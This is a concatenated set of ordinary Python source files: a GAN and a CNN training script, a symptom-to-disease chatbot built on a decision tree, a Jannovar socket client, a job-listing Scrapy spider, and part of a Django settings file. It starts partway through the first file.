fixed_noise = torch.randn(opt.num_batchs, opt.nz, 1, 1)\n real_label = 1\n fake_label = 0\n\n optimizerD = optim.Adam(netD.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n optimizerG = optim.Adam(netG.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n \n for e in range(opt.epochs):\n for i, data in enumerate(dataloader, 0):\n \n netD.zero_grad()\n inp = data[0]\n batch_size = inp.size(0)\n label = torch.full((batch_size, ), real_label)\n \n output = netD(inp)\n\n errD_real = loss(output, label)\n errD_real.backward()\n D_x = output.mean().item()\n\n noise = torch.randn(batch_size, opt.nz, 1, 1)\n fake_img = netG(noise)\n label.fill_(fake_label)\n output = netD(fake_img.detach())\n errD_fake = loss(output, label)\n errD_fake.backward()\n\n D_G_z1 = output.mean().item()\n errD = errD_real + errD_fake\n optimizerD.step()\n\n netG.zero_grad()\n label.fill_(real_label)\n output = netD(fake_img)\n errG = loss(output, label)\n errG.backward()\n D_G_z2 = output.mean().item()\n optimizerG.step()\n\n print('[%d/%d][%d/%d] Loss_D: %.4f Loss_G: %.4f D(x): %.4f D(G(z)): %.4f / %.4f'% \\\n (e, opt.epochs, i, len(dataloader),errD.item(), errG.item(), D_x, D_G_z1, D_G_z2))\n vutils.save_image(inp,'%s/real_samples.png' % opt.out_dir, normalize=True)\n fake = netG(fixed_noise)\n vutils.save_image(fake.detach(),'%s/fake_samples_epoch_%03d.png' % (opt.out_dir, e),normalize=True)\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Generative Adversarial Neural Network')\n\n parser.add_argument('root', help='Directory containing the training images')\n parser.add_argument('--lr', type=float, help='Network learning rate', default=0.0002)\n parser.add_argument('--epochs', type=int, help='Training epochs', default=1000)\n parser.add_argument('--beta1', type=float, help='Adam beta1 parameter', default=0.5)\n parser.add_argument('--num-batchs', type=int, help='Training batches size', default=1)\n parser.add_argument('--workers', type=int, help='Number of parallel threads', default=4)\n parser.add_argument('--nz', type=int, help='Z Noise size', default=100)\n parser.add_argument('--nc', type=int, help='Number of channels of input images', default=3)\n parser.add_argument('--ndf', type=int, help='Number of discriminator features', default=64)\n parser.add_argument('--ngf', type=int, help='Number of generator features', default=64)\n parser.add_argument('--out-dir', help='Generated images output directory', default='./output-images')\n\n return parser.parse_args()\n\nif __name__ == \"__main__\":\n\n opt = parse_args()\n print(opt)\n\n dataset = dset.ImageFolder(root=opt.root,\n transform=transforms.Compose([\n transforms.Resize(image_size),\n transforms.CenterCrop(image_size),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ]))\n\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=opt.num_batchs, shuffle=True, num_workers=opt.workers)\n main(opt, dataloader)\n\n","sub_path":"GAN.py","file_name":"GAN.py","file_ext":"py","file_size_in_byte":6023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"300075052","text":"\"\"\"\r\n@author: abdo\r\nemail : abdo.elsaadny74@gmail.com \r\n\"\"\"\r\n\r\n#import libraries\r\nimport pandas as pd\r\n# import seaborn as sns\r\n# import matplotlib.pyplot as plt\r\n# import numpy as np\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\nfrom sklearn.model_selection import train_test_split\r\n# from sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.tree import DecisionTreeClassifier\r\n\r\nimport wikipedia\r\nimport nltk\r\nfrom nltk.tokenize import sent_tokenize\r\nfrom nltk.tokenize import word_tokenize\r\nimport re\r\n\r\nfrom nltk.stem import PorterStemmer\r\nfrom nltk.corpus import stopwords\r\nimport random\r\nimport db\r\nfrom fuzzywuzzy import process\r\n\r\n\r\n\r\n# this function to remove stop words from text\r\n# stop words: words that have no meaning in english like [the,and ,...] \r\ndef stemming(text):\r\n wt=word_tokenize(text)\r\n ps = PorterStemmer()\r\n word=[]\r\n for i in wt:\r\n x=ps.stem(i)\r\n word.append(x)\r\n return word\r\n\r\ndef stopWords(text):\r\n #text is a sentence\r\n englishword = set(stopwords.words('english'))\r\n filtered = []\r\n words = word_tokenize(text)\r\n for i in words:\r\n if i not in englishword:\r\n filtered.append(i)\r\n return filtered\r\n\r\ndef sorry():\r\n messages = [\"I'm sorry I could not understand that. Let's try again.\"]\r\n return messages\r\n\r\n#great function \r\ndef ask_symptoms():\r\n messages = ['Type your symptoms']\r\n return messages\r\ndef greet():\r\n greeting=['hi','hello'] \r\n for i in greeting: \r\n gr = random.choice (greeting)\r\n messages = [gr,\"I'm MedicalBot, your personal health assistant.\\n I can do that for you : \\n 1-diagnoses of illnesses. \\n 2-Book intensive care unit. \\n PLZ select number of service that you want : \"]\r\n return messages\r\n# greet()\r\n''' \r\ndef chosing ():\r\n messages1=\"I can do that for you :\"\r\n messages2=\"1-diagnoses of illnesses.\"\r\n messages3=\"2-Book intensive care unit.\"\r\n messages4=\"PLZ select number of service that you want :\"\r\n return messages1 , messages2 , messages3 , messages4\r\n '''\r\n \r\n\r\ndef asknames():\r\n askname= [\"what's your name ? \",'your name ? ']\r\n for i in askname:\r\n na=random.choice(askname)\r\n messages = [na]\r\n return messages\r\n \r\n# asknames()\r\n\r\ndef getName(text):\r\n \r\n filtered = stopWords(text)\r\n\r\n\r\n tag = nltk.pos_tag(filtered)\r\n \r\n noun=[]\r\n for i in range(len(tag)):\r\n\r\n if ((str(tag[i][1])=='NN' or str(tag[i][1])=='NNP') and str(tag[i][0])!='name'):\r\n noun.append(tag[i][0])\r\n\r\n chunkGram = r\"\"\"Chunk: {*} \r\n }{\r\n }
{\r\n }{\r\n }{\r\n }{\r\n }{\r\n \r\n \"\"\"\r\n chunkParser = nltk.RegexpParser(chunkGram)\r\n chunked = chunkParser.parse(tag)\r\n\r\n for i in chunked:\r\n if i != ('name','NN','VB','DT','IN','VBD','JJ'):\r\n name = i\r\n messages = f\"Welcome {name[0]}\"\r\n return messages\r\n\r\n# getName(\"my name is abdelrhman \")\r\n\r\n\r\n\r\n# greet()\r\n# yourname =asknames()\r\n# myname=getName(yourname)\r\n\r\ndef askAges(uuid):\r\n askage=['how old are you ? ',\"i'd like to know your age ? \",'tell me your age ? ']\r\n for i in askage:\r\n age=random.choice(askage)\r\n \r\n messages = [getName(db.get_name(uuid)),age]\r\n return messages\r\n #inp = input()\r\n #return inp\r\n# askAges()\r\n \r\ndef getAge(uuid,inage):\r\n\r\n filtered = stopWords(inage)\r\n \r\n for i in filtered:\r\n filtered = stopWords(inage)\r\n for i in filtered:\r\n try:\r\n age = int(i)\r\n except Exception:\r\n continue\r\n #print(myname,' : ' ,age)\r\n messages = [str(db.get_name(uuid))+\":\"+str(age),askGender()]\r\n return messages\r\n\r\n# yourAge = askAges()\r\n# age = getAge(yourAge)\r\n\r\n#this function to ask user about his gender\r\n \r\ndef askGender():\r\n messages = 'Are you a Male or a Female?'\r\n return messages\r\n\r\n# this function to return gender of user \r\ndef getGender(text):\r\n\r\n filtered = stopWords(text)\r\n flag=0\r\n for i in filtered:\r\n if i.lower()=='male' or i.lower()=='female':\r\n \r\n gender = i\r\n flag=1\r\n if flag!=1:\r\n return 0\r\n else:\r\n return gender\r\n\r\n# askGender()\r\n# getGender()\r\n\r\n# -----------------------------------------------------------------------------\r\nclass Natural_language_processing:\r\n\r\n def __init__(self):\r\n \r\n self.info = []\r\n \r\n \r\n \r\n def extract (self,text):\r\n stopWords(text)\r\n token=stemming(text)\r\n\r\n tagged=nltk.pos_tag(token)\r\n \r\n chunkgram=r\"\"\"chunk : {<.*>+}\r\n \t\t}+{\r\n \r\n \r\n \r\n \r\n \r\n chunk:\r\n {
+|
+}\r\n }
{\r\n \r\n chunk:\r\n {
}\r\n }{\r\n }
{\r\n chunk:\r\n {}\r\n }{\r\n }{\r\n chunk:\r\n {}\r\n \r\n chunk:\r\n {
+}\r\n }{\r\n }{\r\n }
{\r\n }{\r\n }{\r\n \r\n \r\n chunk:\r\n {?+}\r\n }{\r\n }{\r\n \r\n \r\n \r\n \r\n \"\"\"\r\n \r\n self.info=[]\r\n chunkparser=nltk.RegexpParser(chunkgram)\r\n chunked=chunkparser.parse(tagged)\r\n # chunked.draw() \r\n \r\n \r\n \r\n for element in chunked:\r\n if hasattr(element, 'label'):\r\n temp = ' '.join(e[0] for e in element)\r\n self.info.append(temp)\r\n \r\n return self.info\r\n \r\nNLP=Natural_language_processing()\r\n \r\n\r\n# Function to convert the list to string \r\ndef listToString(text): \r\n \r\n str1 = \" \" \r\n \r\n return (str1.join(text)) \r\n\r\n \r\n \r\n# -----------------------------------------------------------------------------\r\ndf = pd.read_csv('datasets\\diseasedata.csv')\r\ndf.isnull().sum().sort_values(ascending=False)\r\ndf['prognosis'].value_counts(normalize = True)\r\ndf.dtypes.unique()\r\n\r\nx = df.drop(['prognosis'],axis =1)\r\ny = df['prognosis']\r\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.33, random_state=42)\r\nx_test.shape\r\n\r\nDTC = DecisionTreeClassifier(criterion='entropy', max_depth=10,random_state=80)\r\n\r\n\r\n\r\n# knn=KNeighborsClassifier()\r\n# knn.fit(x_train,y_train)\r\n# knn.predict(x_test)\r\n# # print ('scores for train= ',knn.score(x_test, y_test))\r\n# # print('scores for test : ' , knn.score(x_test, y_test))\r\n# y_pred = knn.predict(x_test)\r\n# print('accuracy_score:',accuracy_score(y_pred,y_test))\r\n\r\ntest_scores={}\r\ntrain_scores={}\r\nfor i in range(2,4,2):\r\n kf = KFold(n_splits = i)\r\n sum_train = 0\r\n sum_test = 0\r\n data = df\r\n for train,test in kf.split(data):\r\n train_data = data.iloc[train,:]\r\n test_data = data.iloc[test,:]\r\n x_train = train_data.drop([\"prognosis\"],axis=1)\r\n y_train = train_data['prognosis']\r\n x_test = test_data.drop([\"prognosis\"],axis=1)\r\n y_test = test_data[\"prognosis\"]\r\n algo_model = DTC.fit(x_train,y_train)\r\n sum_train += DTC.score(x_train,y_train)\r\n y_pred = DTC.predict(x_test)\r\n sum_test += accuracy_score(y_test,y_pred)\r\n average_test = sum_test/i\r\n average_train = sum_train/i\r\n test_scores[i] = average_test\r\n train_scores[i] = average_train\r\n\r\n\r\n#for check only\r\n# real_diseases = y_test.values\r\n\r\n# for i in range(0, len(real_diseases)):\r\n# if y_pred[i] == real_diseases[i]:\r\n# # print ('Pred: {0} Actual:{1}'.format(y_pred[i], real_diseases[i]))\r\n# else:\r\n# # print('worng prediction')\r\n# # print ('Pred: {0} Actual:{1}'.format(y_pred[i], real_diseases[i]))\r\n \r\n \r\n \r\nCM = confusion_matrix(y_test, y_pred)\r\n# print('Confusion Matrix is : \\n', CM)\r\n \r\n# sns.heatmap(CM, center = True)\r\n\r\n# plt.show()\r\n\r\n\r\n# df['prognosis'].value_counts(normalize = False).plot.scatter()\r\n# plt.subplots_adjust(left = 0.9, right = 2 , top = 2, bottom = 1)\r\n\r\n# -----------------------------------auto correction----------------------------\r\nReplacement_pattern ={\"rash skin\":\"skin_rash\",\"skin rash\":\"skin_rash\",\r\n \r\n \" sneez\":\"continuous_sneez\",\"continuous sneaz\":\"continuous_sneezing\",\r\n \r\n \"stomach pain\" :\"stomach_pain\",\"pain stomache\":\"stomach_pain\",\r\n \"muscle wast\":\"muscle_wasting\",\"wast muscle\":\"muscle_wasting\",\r\n \"cold hands\":\"cold_hands_and_feets\",\"cold hand and feet\":\"cold_hands_and_feets\",\"cold feets\":\"cold_hands_and_feets\",\r\n \"weight gain\":\"weight_gain\",\"gain weight\":\"weight_gain\",\r\n \"weight loss\":\"weight_loss\",\"loss weight\":\"weight_loss\",\r\n \r\n \"high fever\":\"high_fever\",\"fever high\":\"high_fever\",\r\n \"breathless\":\"breathlessness\",\"low breath\":\"breathlessness\",\r\n \"head mild fever\":\"headache\",\"ashe\":\"headache\",\r\n \"back pain\":\"back_pain\",\"pain back\":\"back_pain\",\r\n \"runny nose\":\"runny_nose\",\"nose runy\":\"runny_nose\",\r\n \"chest pain\":\"chest_pain\",\"pain chest\":\"chest_pain\",\r\n \"fast heart \":\"fast_heart_rate\",\"fast heart rate\":\"fast_heart_rate\",\r\n \"neck pain\":\"neck_pain\",\"pain neck\":\"neck_pain\"\r\n\r\n }\r\n\r\n\r\ndef expand_contractions(sentence, text): \r\n \r\n contractions_pattern = re.compile('({})'.format('|'.join(text.keys())), \r\n flags=re.IGNORECASE|re.DOTALL) \r\n def expand_match(contraction): \r\n match = contraction.group(0) \r\n first_char = match[0] \r\n expanded_contraction = text.get(match) if text.get(match) else text.get(match.lower()) \r\n expanded_contraction = first_char+expanded_contraction[1:] \r\n return expanded_contraction \r\n \r\n expanded_sentence = contractions_pattern.sub(expand_match, sentence) \r\n return expanded_sentence \r\n \r\n\r\ndef splitting(text): \r\n return ([i for item in text for i in item.split()]) \r\n\r\nwith open(\"datasets\\sym.txt\",\"r\") as f :\r\n sym=f.read().split('\\n')\r\n\r\ndef match(query,choise,limit=1):\r\n result=process.extract(query,choise,limit=limit)\r\n return result\r\n\r\n\r\n\r\ndef fuzzy(text):\r\n text1=word_tokenize(text)\r\n correction=[]\r\n for i in text1:\r\n a=match(i,sym)\r\n if (a[0][1]<80):\r\n continue\r\n else:\r\n correction.append(a[0][0])\r\n return correction\r\n# ---------------------------------end autocorrection-------------------------------\r\n\r\n\r\ndef getdisease(symptoms):\r\n \r\n l=NLP.extract(symptoms)\r\n lts=listToString(l)\r\n # print (lts)\r\n \r\n expanded_corpus =[expand_contractions(txt, Replacement_pattern) \r\n for txt in sent_tokenize(lts)]\r\n words=splitting(expanded_corpus)\r\n lts1=listToString(words)\r\n # print(lts1)\r\n correction_word=fuzzy(lts1)\r\n # print(correction_word)\r\n \r\n token = [str(x) for x in correction_word]\r\n a=[]\r\n compare=[item for item in token if item in x.columns]\r\n \r\n for i in (x.columns):\r\n \r\n if i in compare:\r\n a.append(1)\r\n elif i not in compare:\r\n a.append(0)\r\n else:\r\n return sorry()\r\n \r\n y_diagnosis = DTC.predict([a])\r\n y_pred_2 = DTC.predict_proba([a])\r\n # prediction = f\"i predict you have {y_diagnosis[0]} disease, confidence score of : {y_pred_2.max()* 100}%\"\r\n # prediction = (('i predict you have %s disease, confidence score of : = %s') %(y_diagnosis[0],y_pred_2.max()* 100),'%' )\r\n \r\n wiki=str(y_diagnosis[0])\r\n #print ('this is info about your disease :')\r\n #print ('\\n',wikipedia.summary(wiki, sentences=2))\r\n \r\n #print(('Name = %s , Age : = %s') %(i_name,i_age))\r\n\r\n messages = [f\"i predict you have {y_diagnosis[0]} disease, confidence score of : {y_pred_2.max()* 100}%\",'this is info about your disease :',wikipedia.summary(wiki, sentences=2),'note : \\n Do not depend on this result .. Please see a doctor']\r\n return messages\r\n\r\n#def note():\r\n# messages=['note : \\n Do not depend on this result .. Please see a doctor']\r\n# return messages\r\n\r\n# getdisease('cough and brethless and high fever')\r\n\r\n \r\n \r\n\r\n#start conversation :the point that acully start with \r\n\r\n\"\"\"\r\nif inpp == 1:\r\n yourname = asknames()\r\n myname=getName(yourname)\r\n yourAge = askAges()\r\n age = getAge(yourAge)\r\n \r\n yourgender = askGender()\r\n gender = getGender(yourgender)\r\n while gender==0:\r\n sorry()\r\n ufGender = askGender()\r\n gender = getGender(ufGender)\r\n \r\n getdisease() \r\n \r\nelif inpp==2:\r\n print ('you are choosed 2')\r\n\"\"\"\r\n\r\n\r\n\r\nif __name__=='__main__':\r\n print (greet())\r\n inpp=str (input())\r\n if inpp=='1':\r\n print(asknames())\r\n names=input()\r\n print (getName(names))\r\n\r\n# askAges()\r\n# ages=input()\r\n# getAge()\r\n \r\n print (askGender())\r\n genders=input()\r\n getGender(genders)\r\n while genders==0:\r\n print(sorry())\r\n print (askGender())\r\n genders=input()\r\n print(getGender(genders))\r\n \r\n print(ask_symptoms())\r\n symptoms=str (input())\r\n print (getdisease(symptoms))\r\n \r\n \r\n elif inpp=='2':\r\n print ('This service will be available in the near future')\r\n \r\n \r\n \r\n \r\n# getdisease(' high fever and breathless and cough')\r\n \r\n \r\n \r\n","sub_path":"src/Medbot.py","file_name":"Medbot.py","file_ext":"py","file_size_in_byte":14531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"143151597","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 23 11:16:39 2018\n\n@author: toast\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data as Data\nfrom torch.autograd import Variable\n\n#HYPER PARAMETERS\nEPOCH = 10\nBATCH_SIZE = 64\nLR = 0.0001\nDATA_LOAD = 0\n\nclass CNN(nn.Module):\n def __init__(self):\n super(CNN,self).__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_channels=1,\n out_channels=64,\n kernel_size=5,\n stride=1,\n padding=2),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2)\n )\n self.conv2 = nn.Sequential(\n nn.Conv2d(in_channels=64,\n out_channels=32,\n kernel_size=5,\n stride=1,\n padding=2),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2)\n )\n self.fc = nn.Sequential(\n nn.Linear(32*12*12,7),\n# nn.ReLU(),\n# nn.Linear(15,7)\n )\n \n \n \n def forward(self,x):\n x = self.conv1(x)\n x = self.conv2(x)\n x = x.view(x.size(0),-1)\n x = self.fc(x)\n return x\n\n\n\n\n\n#DATA PREPROCESSING\n\nif DATA_LOAD:\n data = []\n label = []\n df = pd.read_csv(\"../data/HW3_train.csv\")\n df_data = df.values.T\n del df\n label = df_data[0]\n _data = df_data[1]\n del df_data\n for i in _data:\n tmp = [float(x) for x in i.split(' ')]\n data.append(tmp)\n \n data = np.array(data)\n data = np.reshape(data,(-1,1,48,48)) #BATCH,CHANNEL,HEIGHT,WIDTH\n data = data/255.\n\n data = torch.from_numpy(data.astype('float32')) \n label = torch.from_numpy(label.astype('int32'))\n \n data_set = Data.TensorDataset(data,label)\n loader = Data.DataLoader(\n dataset = data_set,\n batch_size = BATCH_SIZE,\n shuffle = True,\n num_workers=2)\n\n\n\n \n\n#NN\ncnn = CNN()\nif torch.cuda.is_available:\n cnn.cuda()\n\noptimizer = optim.Adam(cnn.parameters(),lr=LR)\nloss_func = nn.CrossEntropyLoss()\n\nfor epoch in range(EPOCH):\n for step, (x,y) in enumerate(loader):\n Bx = Variable(x)\n By = Variable(y)\n \n pred = cnn(Bx.cuda())\n loss = loss_func(pred.cuda(),By.cuda())\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n if step%64==0:\n pred = torch.max(pred.cpu(),1)[1].data.numpy()\n By = By.cpu().data.numpy()\n acc = (By==pred).mean()\n# print('loss is %.3f' % loss.data[0])\n print('acc is %.3f' % acc)\n\n\n\n\n\n\"\"\"\nTx = []\nTy = []\ndf = pd.read_csv(\"../data/HW3_test.csv\")\ndf_data = df.values.T\ndel df\nTy = df_data[0]\n_data = df_data[1]\ndel df_data\nfor i in _data:\n tmp = [float(x) for x in i.split(' ')]\n Tx.append(tmp)\n\nTx = np.array(Tx)\nTx = np.reshape(Tx,(-1,1,48,48)) #BATCH,CHANNEL,HEIGHT,WIDTH\nTx = Tx/255.\n\nTx = torch.from_numpy(Tx.astype('float32')) \nTy = torch.from_numpy(Ty.astype('int32'))\n\n\"\"\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n ","sub_path":"HW3.py","file_name":"HW3.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"580249265","text":"'''Client Interface to Jannovar VCF converter server.\n'''\nimport socket\nimport select\nimport logging\nimport io\nimport typing\n\nfrom contextlib import contextmanager\n\nfrom lib.vcf_jannovar import jannovar_vcf_to_table\nfrom lib.singleton import LazyConfigure\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass JannovarClient(LazyConfigure):\n '''Implements a basic stream socket client.\n Built after simple toy implementation here:\n https://docs.python.org/3/howto/sockets.html\n '''\n\n def __init__(\n self,\n ):\n super().__init__()\n self.url = None\n self.port = None\n\n def configure(\n self,\n url: str = \"localhost\",\n port: int = 8888,\n ):\n super().configure()\n self.url = url\n self.port = port\n\n def create_vcf(\n self,\n variants: [str],\n zygosity: str,\n case_id: str,\n ) -> typing.Union[\"pandas.DataFrame\", str]:\n '''Create pandas dataframe with vcf information.'''\n status, vcf_text = self.process_variants(variants)\n # return error\n if status < 0:\n return vcf_text\n\n with io.StringIO(vcf_text) as reader:\n vcf_table = jannovar_vcf_to_table(\n reader, case_id, zygosity, variants\n )\n\n return vcf_table\n\n def process_variants(self, variants: [str]) -> (int, str):\n '''Submit hgvs vcf file from server.'''\n msg = \"\\n\".join(variants) + \"\\n\"\n\n msg = \"{}\\n{}\".format(len(msg), msg)\n\n byte_msg = msg.encode(\"utf-8\")\n data = None\n status = 0\n with self._connect() as con:\n try:\n self._send(con, byte_msg)\n ready = select.select([con], [], [], 20)\n if ready[0]:\n status, raw_data = self._recv(con)\n data = raw_data.decode(\"utf-8\")\n except RuntimeError as error:\n LOGGER.warning(error)\n data = None\n return status, data\n\n def can_connect(self):\n '''Test whether server can be reached.'''\n try:\n with self._connect():\n pass\n except ConnectionRefusedError:\n return False\n return True\n\n @contextmanager\n def _connect(self):\n '''Handle connection to jannovar server.'''\n connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n connection.connect((self.url, self.port))\n yield connection\n connection.close()\n\n @staticmethod\n def _send(sock: socket.socket, msg: bytes):\n sent_bytes = 0\n\n while sent_bytes < len(msg):\n sent = sock.send(msg[sent_bytes:])\n if sent == 0:\n raise RuntimeError(\"connection broken\")\n sent_bytes += sent\n\n @staticmethod\n def _recv(sock: socket.socket) -> (int, bytes):\n # infer size from first line\n initial = sock.recv(2048)\n msglen, status, chunk = initial.split(b\"\\n\", 2)\n msglen = int(msglen.decode(\"utf-8\"))\n status = int(status.decode(\"utf-8\"))\n bytes_recd = len(chunk)\n chunks = [chunk]\n\n while bytes_recd < msglen:\n chunk = sock.recv(min(msglen - bytes_recd, 2048))\n\n if chunk == b\"\":\n raise RuntimeError(\"connection broken\")\n\n chunks.append(chunk)\n bytes_recd += len(chunk)\n\n return status, b\"\".join(chunks)\n","sub_path":"lib/api/jannovar.py","file_name":"jannovar.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"145677709","text":"# _*_ coding: utf-8 _*_\n\"\"\"This file is a job120 spider created on top of the ATSSpider\nscrapy crawl job120 -a url=\"http://www.job120.com/search/info.aspx\" -a mining_job_id=999 -a iteration=1 -a extract=1\nsample url:\n http://www.job120.com/search/info.aspx\n\"\"\"\nfrom re import compile\n\nfrom scrapy.selector import Selector\nfrom scrapy.http import Request\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, Replace\n\n\nclass Job120(ATSSpider):\n\n name = \"job120\"\n ref_reg = compile(\"-(\\d+)\\.html\")\n\n def parse(self, response):\n sel = Selector(response)\n jobs = sel.xpath(\"//div[@class='pss_rnr']/ul/li/div\")\n for job in jobs:\n job_link = job.xpath(\"./h1/a/@href\").extract()\n if job_link:\n meta = {\n 'title': job.xpath(\"./h1/a[1]//text()\").extract(),\n 'company': job.xpath(\"./h1/a[2]//text()\").extract(),\n 'location': job.xpath(\n \".//p/node()[contains(.,'%s')]\"\n % unicode(\"工作地点:\", 'utf-8')\n ).extract(),\n }\n yield Request(\n job_link[0], meta=meta, callback=self.parse_job_callback()\n )\n\n next_page = sel.xpath(\n \"//a[contains(text(),'%s')]/@href\" % unicode('下一页', 'utf-8')\n ).extract()\n if next_page:\n yield Request(next_page[0], callback=self.parse)\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n loader.add_value('url', response.url)\n loader.add_value('title', response.meta['title'])\n loader.add_value('company', response.meta['company'])\n loader.add_value(\n 'location', response.meta['location'], Replace(unicode(\"工作地点:\", 'utf-8'))\n )\n loader.add_xpath(\n 'description',\n \"//div[@class='applybox']/preceding-sibling::node()[preceding-sibling::div[@class='jobbox_02_div']]\"\n )\n # try this xml only if above xpath not given any data\n if not loader.get_output_value('description'):\n loader.add_xpath(\n 'description',\n \"//div[@class='jobbox_02_divinfo']/node()[not(span/f)]\"\n )\n loader.add_xpath(\n 'jobtype',\n \"//li[contains(text(),'%s')]/text()\" % unicode(\"工作性质:\", 'utf-8'),\n Replace(unicode(\"工作性质:\", 'utf-8'))\n )\n loader.add_xpath(\n 'baseSalary',\n \"//li[contains(text(), '%s')]/text()\" % unicode(\"薪资待遇:\", 'utf-8'),\n Replace(unicode(\"薪资待遇:\", 'utf-8'))\n )\n loader.add_value(\n 'referencenumber', response.url, Prefix(self.name+\"-\"),\n re=self.ref_reg\n )\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/job120.py","file_name":"job120.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"210795125","text":"# -*- coding: utf-8 -*-\n\nimport os\n\ndirs = ['fonts', 'fonts_reserve', 'raw_img', 'real_img_origin',\n 'real_img', 'fake_img', 'fake_img_mosaicking', 'model_data']\n\nfor dir in dirs:\n if not os.path.exists(dir):\n os.mkdir(dir)\n","sub_path":"make_dirs.py","file_name":"make_dirs.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"204044711","text":"\"\"\"\nDjango settings for Butterflies project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '&&-w3r0%bk#ye8g&7b0lio*60%2+m!+4a%*ukbm#9u3+t3%l=*'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'rest_framework',\n 'rest_framework.authtoken',\n)\n\nTHIRD_PARTY_APPS = ()\n\nPROJECT_APPS = (\n 'polls',\n 'quadratic',\n 'exhibition',\n 'collector',\n 'sponsors',\n 'feedbacks',\n)\n\nINSTALLED_APPS = INSTALLED_APPS + PROJECT_APPS + THIRD_PARTY_APPS\n\nREST_FRAMEWORK = {\n 'DEFAULT_RENDERER_CLASSES': ('rest_framework.renderers.JSONRenderer',),\n 'DEFAULT_PERMISSION_CLASSES': ('rest_framework.permissions.IsAuthenticatedOrReadOnly',),\n 'PAGE_SIZE': 10,\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework.authentication.TokenAuthentication',\n ),\n}\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'butterflies.urls'\n\nWSGI_APPLICATION = 'butterflies.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n# Login\nLOGIN_REDIRECT_URL = '/'\n\nLOGIN_URL = '/login/'\n\n# Media files\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n\nMEDIA_URL = '/media/'\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.contrib.auth.context_processors.auth\",\n \"django.core.context_processors.request\",\n \"django.core.context_processors.debug\",\n \"django.core.context_processors.i18n\",\n \"django.core.context_processors.media\",\n \"django.core.context_processors.static\",\n \"django.core.context_processors.tz\",\n \"django.contrib.messages.context_processors.messages\",\n)\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nPROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))\n\nSTATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')\nSTATIC_URL = '/static/'\n\n# Extra places for collectstatic to find static files.\nSTATICFILES_DIRS = (os.path.join(PROJECT_ROOT, 'static'),)\n\nTEMPLATE_DIRS = (os.path.join(BASE_DIR, 'templates'), 